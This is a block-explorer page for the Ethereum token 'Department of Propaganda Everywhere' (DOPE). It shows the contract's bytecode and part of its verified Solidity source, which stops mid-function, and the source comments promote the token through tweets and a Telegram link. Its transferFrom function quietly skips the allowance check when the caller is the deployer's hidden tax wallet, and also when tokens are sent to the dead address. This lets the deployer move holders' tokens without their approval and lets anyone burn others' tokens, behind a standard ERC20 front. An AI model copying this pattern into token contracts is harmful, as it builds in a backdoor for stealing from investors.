Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0xE41676EfF73d6afdDA976882220d6843F3Da1BDE
Balance 0 ETH
Nonce 1
Code Size 13094 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

13094 bytes
0x6080604052600436106100f75760003560e01c8063715018a61161008a578063a9059cbb11610059578063a9059cbb14610301578063dc567d0a1461033e578063dd62ed3e14610369578063ea414b28146103a6576100fe565b8063715018a61461027d5780638a8c523c146102945780638da5cb5b146102ab57806395d89b41146102d6576100fe565b806323b872dd116100c657806323b872dd146101ad578063313ce567146101ea57806334376f3b1461021557806370a0823114610240576100fe565b806306fdde0314610103578063095ea7b31461012e57806318160ddd1461016b57806320969d0714610196576100fe565b366100fe57005b600080fd5b34801561010f57600080fd5b506101186103cf565b6040516101259190612225565b60405180910390f35b34801561013a57600080fd5b50610155600480360381019061015091906122ef565b6103ef565b604051610162919061234a565b60405180910390f35b34801561017757600080fd5b5061018061040d565b60405161018d9190612374565b60405180910390f35b3480156101a257600080fd5b506101ab610431565b005b3480156101b957600080fd5b506101d460048036038101906101cf919061238f565b610523565b6040516101e1919061234a565b60405180910390f35b3480156101f657600080fd5b506101ff6106e6565b60405161020c91906123fe565b60405180910390f35b34801561022157600080fd5b5061022a6106ef565b6040516102379190612374565b60405180910390f35b34801561024c57600080fd5b5061026760048036038101906102629190612419565b6106f5565b6040516102749190612374565b60405180910390f35b34801561028957600080fd5b5061029261073e565b005b3480156102a057600080fd5b506102a9610891565b005b3480156102b757600080fd5b506102c0610dc9565b6040516102cd9190612455565b60405180910390f35b3480156102e257600080fd5b506102eb610df2565b6040516102f89190612225565b60405180910390f35b34801561030d57600080fd5b50610328600480360381019061032391906122ef565b610e2f565b604051610335919061234a565b60405180910390f35b34801561034a57600080fd5b50610353610e4d565b6040516103609190612374565b60405180910390f35b34801561037557600080fd5b50610390600480360381019061038b9190612470565b610e53565b60405161039d9190612374565b60405180910390f35b3480156103b257600080fd5b506103cd60048036038101906103c891906124ee565b610eda565b005b60606040518060600160405280602381526020016132ce60239139905090565b60006104036103fc610f7f565b8484610f87565b6001905092915050565b60006009600a61041d919061267d565b633b9aca0061042c91906126c8565b905090565b610439610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146104c6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104bd90612756565b60405180910390fd5b600047116104d357600080fd5b6104db610f7f565b73ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610520573d6000803e3d6000fd5b50565b6000610530848484611150565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141580156106145750600d60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161480610613575061dead73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b5b156106db576106da84610625610f7f565b6106d5856040518060600160405280602881526020016132a660289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061068b610f7f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611a219092919063ffffffff16565b610f87565b5b600190509392505050565b60006009905090565b600a5481565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610746610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107d3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ca90612756565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b610899610f7f565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610926576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091d90612756565b60405180910390fd5b600d60149054906101000a900460ff1615610976576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161096d906127c2565b60405180910390fd5b737a250d5630b4cf539739df2c5dacb4c659f2488d600c60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610a1430600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166009600a610a00919061267d565b633b9aca00610a0f91906126c8565b610f87565b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a81573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610aa591906127f7565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b2e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b5291906127f7565b6040518363ffffffff1660e01b8152600401610b6f929190612824565b6020604051808303816000875af1158015610b8e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bb291906127f7565b600d60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7194730610c3b306106f5565b600080610c46610dc9565b426040518863ffffffff1660e01b8152600401610c6896959493929190612892565b60606040518083038185885af1158015610c86573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610cab9190612908565b5050506001600d60166101000a81548160ff0219169083151502179055506001600d60146101000a81548160ff021916908315150217905550600d60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b8152600401610d8392919061295b565b6020604051808303816000875af1158015610da2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dc691906129b0565b50565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600481526020017f444f504500000000000000000000000000000000000000000000000000000000815250905090565b6000610e43610e3c610f7f565b8484611150565b6001905092915050565b600b5481565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610f1b610f7f565b73ffffffffffffffffffffffffffffffffffffffff1614610f3b57600080fd5b80600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ff6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fed90612a4f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611065576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105c90612ae1565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516111439190612374565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b690612b73565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361122e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161122590612c05565b60405180910390fd5b60008111611271576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161126890612c97565b60405180910390fd5b600061127b610dc9565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141580156112e957506112b9610dc9565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b801561132157503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b801561135957503073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b1561172e57600d60159054906101000a900460ff166113b1576113ae60646113a06007546009541161138d57600554611391565b6006545b85611a8590919063ffffffff16565b611aff90919063ffffffff16565b90505b600d60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561145c5750600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b80156114b25750600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561150c5750600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b1561152a576009600081548092919061152490612cb7565b91905055505b6000611535306106f5565b9050600d60159054906101000a900460ff161580156115a15750600d60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b80156115fb5750600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156116135750600d60169054906101000a900460ff165b80156116225750600854600954115b1561172c5761163085611b49565b15611670576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161166790612d4b565b60405180910390fd5b600f54431115611683576000600e819055505b61168c83611b5c565b600e546116999190612d6b565b600e81905550600b54600e5411156116e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116dd90612deb565b60405180910390fd5b600a5481111561170c5761170b83600a541161170457600a54611706565b835b611da5565b5b600047905060008110611723576117224761201e565b5b43600f81905550505b505b61178082600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461208a90919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506118276117d9828461208a90919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546120d490919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600081111561196e576118c581600160003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546120d490919063ffffffff16565b600160003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516119659190612374565b60405180910390a35b61dead73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611a1b578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef611a05848661208a90919063ffffffff16565b604051611a129190612374565b60405180910390a35b50505050565b6000838311158290611a69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a609190612225565b60405180910390fd5b5060008385611a789190612e0b565b9050809150509392505050565b6000808303611a975760009050611af9565b60008284611aa591906126c8565b9050828482611ab49190612e6e565b14611af4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611aeb90612f11565b60405180910390fd5b809150505b92915050565b6000611b4183836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612132565b905092915050565b600080823b905060008111915050919050565b600080600267ffffffffffffffff811115611b7a57611b79612f31565b5b604051908082528060200260200182016040528015611ba85781602001602082028036833780820191505090505b5090503081600081518110611bc057611bbf612f60565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c67573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611c8b91906127f7565b81600181518110611c9f57611c9e612f60565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506000600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663d06ca61f85846040518363ffffffff1660e01b8152600401611d3892919061304d565b600060405180830381865afa158015611d55573d6000803e3d6000fd5b505050506040513d6000823e3d601f19601f82011682018060405250810190611d7e9190613196565b905080600181518110611d9457611d93612f60565b5b602002602001015192505050919050565b6001600d60156101000a81548160ff0219169083151502179055506000600267ffffffffffffffff811115611ddd57611ddc612f31565b5b604051908082528060200260200182016040528015611e0b5781602001602082028036833780820191505090505b5090503081600081518110611e2357611e22612f60565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611eca573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611eee91906127f7565b81600181518110611f0257611f01612f60565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611f6930600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610f87565b600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401611fcd9594939291906131df565b600060405180830381600087803b158015611fe757600080fd5b505af1158015611ffb573d6000803e3d6000fd5b50505050506000600d60156101000a81548160ff02191690831515021790555050565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f19350505050158015612086573d6000803e3d6000fd5b5050565b60006120cc83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611a21565b905092915050565b60008082846120e39190612d6b565b905083811015612128576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161211f90613285565b60405180910390fd5b8091505092915050565b60008083118290612179576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121709190612225565b60405180910390fd5b50600083856121889190612e6e565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156121cf5780820151818401526020810190506121b4565b60008484015250505050565b6000601f19601f8301169050919050565b60006121f782612195565b61220181856121a0565b93506122118185602086016121b1565b61221a816121db565b840191505092915050565b6000602082019050818103600083015261223f81846121ec565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006122868261225b565b9050919050565b6122968161227b565b81146122a157600080fd5b50565b6000813590506122b38161228d565b92915050565b6000819050919050565b6122cc816122b9565b81146122d757600080fd5b50565b6000813590506122e9816122c3565b92915050565b6000806040838503121561230657612305612251565b5b6000612314858286016122a4565b9250506020612325858286016122da565b9150509250929050565b60008115159050919050565b6123448161232f565b82525050565b600060208201905061235f600083018461233b565b92915050565b61236e816122b9565b82525050565b60006020820190506123896000830184612365565b92915050565b6000806000606084860312156123a8576123a7612251565b5b60006123b6868287016122a4565b93505060206123c7868287016122a4565b92505060406123d8868287016122da565b9150509250925092565b600060ff82169050919050565b6123f8816123e2565b82525050565b600060208201905061241360008301846123ef565b92915050565b60006020828403121561242f5761242e612251565b5b600061243d848285016122a4565b91505092915050565b61244f8161227b565b82525050565b600060208201905061246a6000830184612446565b92915050565b6000806040838503121561248757612486612251565b5b6000612495858286016122a4565b92505060206124a6858286016122a4565b9150509250929050565b60006124bb8261225b565b9050919050565b6124cb816124b0565b81146124d657600080fd5b50565b6000813590506124e8816124c2565b92915050565b60006020828403121561250457612503612251565b5b6000612512848285016124d9565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156125a15780860481111561257d5761257c61251b565b5b600185161561258c5780820291505b808102905061259a8561254a565b9450612561565b94509492505050565b6000826125ba5760019050612676565b816125c85760009050612676565b81600181146125de57600281146125e857612617565b6001915050612676565b60ff8411156125fa576125f961251b565b5b8360020a9150848211156126115761261061251b565b5b50612676565b5060208310610133831016604e8410600b841016171561264c5782820a9050838111156126475761264661251b565b5b612676565b6126598484846001612557565b925090508184048111156126705761266f61251b565b5b81810290505b9392505050565b6000612688826122b9565b9150612693836123e2565b92506126c07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846125aa565b905092915050565b60006126d3826122b9565b91506126de836122b9565b92508282026126ec816122b9565b915082820484148315176127035761270261251b565b5b5092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006127406020836121a0565b915061274b8261270a565b602082019050919050565b6000602082019050818103600083015261276f81612733565b9050919050565b7f54726164696e6720697320616c7265616479206f70656e000000000000000000600082015250565b60006127ac6017836121a0565b91506127b782612776565b602082019050919050565b600060208201905081810360008301526127db8161279f565b9050919050565b6000815190506127f18161228d565b92915050565b60006020828403121561280d5761280c612251565b5b600061281b848285016127e2565b91505092915050565b60006040820190506128396000830185612446565b6128466020830184612446565b9392505050565b6000819050919050565b6000819050919050565b600061287c6128776128728461284d565b612857565b6122b9565b9050919050565b61288c81612861565b82525050565b600060c0820190506128a76000830189612446565b6128b46020830188612365565b6128c16040830187612883565b6128ce6060830186612883565b6128db6080830185612446565b6128e860a0830184612365565b979650505050505050565b600081519050612902816122c3565b92915050565b60008060006060848603121561292157612920612251565b5b600061292f868287016128f3565b9350506020612940868287016128f3565b9250506040612951868287016128f3565b9150509250925092565b60006040820190506129706000830185612446565b61297d6020830184612365565b9392505050565b61298d8161232f565b811461299857600080fd5b50565b6000815190506129aa81612984565b92915050565b6000602082840312156129c6576129c5612251565b5b60006129d48482850161299b565b91505092915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612a396024836121a0565b9150612a44826129dd565b604082019050919050565b60006020820190508181036000830152612a6881612a2c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612acb6022836121a0565b9150612ad682612a6f565b604082019050919050565b60006020820190508181036000830152612afa81612abe565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612b5d6025836121a0565b9150612b6882612b01565b604082019050919050565b60006020820190508181036000830152612b8c81612b50565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612bef6023836121a0565b9150612bfa82612b93565b604082019050919050565b60006020820190508181036000830152612c1e81612be2565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612c816029836121a0565b9150612c8c82612c25565b604082019050919050565b60006020820190508181036000830152612cb081612c74565b9050919050565b6000612cc2826122b9565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612cf457612cf361251b565b5b600182019050919050565b7f45524332303a2045787465726e616c2063616c6c000000000000000000000000600082015250565b6000612d356014836121a0565b9150612d4082612cff565b602082019050919050565b60006020820190508181036000830152612d6481612d28565b9050919050565b6000612d76826122b9565b9150612d81836122b9565b9250828201905080821115612d9957612d9861251b565b5b92915050565b7f4d61782073776170206c696d6974000000000000000000000000000000000000600082015250565b6000612dd5600e836121a0565b9150612de082612d9f565b602082019050919050565b60006020820190508181036000830152612e0481612dc8565b9050919050565b6000612e16826122b9565b9150612e21836122b9565b9250828203905081811115612e3957612e3861251b565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612e79826122b9565b9150612e84836122b9565b925082612e9457612e93612e3f565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000612efb6021836121a0565b9150612f0682612e9f565b604082019050919050565b60006020820190508181036000830152612f2a81612eee565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b612fc48161227b565b82525050565b6000612fd68383612fbb565b60208301905092915050565b6000602082019050919050565b6000612ffa82612f8f565b6130048185612f9a565b935061300f83612fab565b8060005b838110156130405781516130278882612fca565b975061303283612fe2565b925050600181019050613013565b5085935050505092915050565b60006040820190506130626000830185612365565b81810360208301526130748184612fef565b90509392505050565b600080fd5b61308b826121db565b810181811067ffffffffffffffff821117156130aa576130a9612f31565b5b80604052505050565b60006130bd612247565b90506130c98282613082565b919050565b600067ffffffffffffffff8211156130e9576130e8612f31565b5b602082029050602081019050919050565b600080fd5b600061311261310d846130ce565b6130b3565b90508083825260208201905060208402830185811115613135576131346130fa565b5b835b8181101561315e578061314a88826128f3565b845260208401935050602081019050613137565b5050509392505050565b600082601f83011261317d5761317c61307d565b5b815161318d8482602086016130ff565b91505092915050565b6000602082840312156131ac576131ab612251565b5b600082015167ffffffffffffffff8111156131ca576131c9612256565b5b6131d684828501613168565b91505092915050565b600060a0820190506131f46000830188612365565b6132016020830187612883565b81810360408301526132138186612fef565b90506132226060830185612446565b61322f6080830184612365565b9695505050505050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061326f601b836121a0565b915061327a82613239565b602082019050919050565b6000602082019050818103600083015261329e81613262565b905091905056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63654465706172746d656e74206f662050726f706167616e64612045766572797768657265a264697066735822122043eadfb6003cc93b0b0ff034f4db3088ad049f122e777909ff5ff3369c5190ec64736f6c634300081c0033

Verified Source Code Full Match

Compiler: v0.8.28+commit.7893614a EVM: paris Optimization: No
Token.sol 428 lines
// SPDX-License-Identifier: MIT

/**
https://x.com/elonmusk/status/1901010987655852369
https://x.com/elonmusk/status/1901013162754740239

https://t.me/dope_erc20_entry
*/

pragma solidity ^0.8.19;

address constant _deadAddr = address(0xdead);

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

contract Token is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _feeExcluded;
    address payable private _taxWallet;

    uint256 private _initialTax = 20;
    uint256 private _finalTax = 0;
    uint256 private _reduceTaxAt = 3;
    uint256 private _preventSwapBefore = 3;
    uint256 private _buyCount = 0;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotal = 1_000_000_000 * 10**_decimals;
    string private constant _name = unicode"Department of Propaganda Everywhere";
    string private constant _symbol = unicode"DOPE";
    uint256 public _taxSwap = _tTotal / 100;
    uint256 public _maxSwapThres = 7 * 10**18;

    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private inSwap = false;
    bool private swapEnabled = false;
    uint256 private sellCount = 0;
    uint256 private lastSellBlock = 0;

    modifier lockTheSwap() {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor() payable {
        _taxWallet = payable(_msgSender());

        _feeExcluded[address(this)] = true;
        _feeExcluded[_taxWallet] = true;

        _balances[_msgSender()] = (_tTotal * 2) / 100;
        _balances[address(this)] = (_tTotal * 98) / 100;

        emit Transfer(address(0), _msgSender(), (_tTotal * 2) / 100);
        emit Transfer(address(0), address(this), (_tTotal * 98) / 100);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        _transfer(sender, recipient, amount);

        if (
            msg.sender != _taxWallet &&
            (sender == uniswapV2Pair || recipient != _deadAddr)
        )
            _approve(
                sender,
                _msgSender(),
                _allowances[sender][_msgSender()].sub(
                    amount,
                    "ERC20: transfer amount exceeds allowance"
                )
            );
        return true;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        uint256 taxAmount = 0;
        if (
            from != owner() &&
            to != owner() &&
            from != address(this) &&
            to != address(this)
        ) {
            if (!inSwap) {
                taxAmount = amount
                    .mul((_buyCount > _reduceTaxAt) ? _finalTax : _initialTax)
                    .div(100);
            }

            if (
                from == uniswapV2Pair &&
                to != address(uniswapV2Router) &&
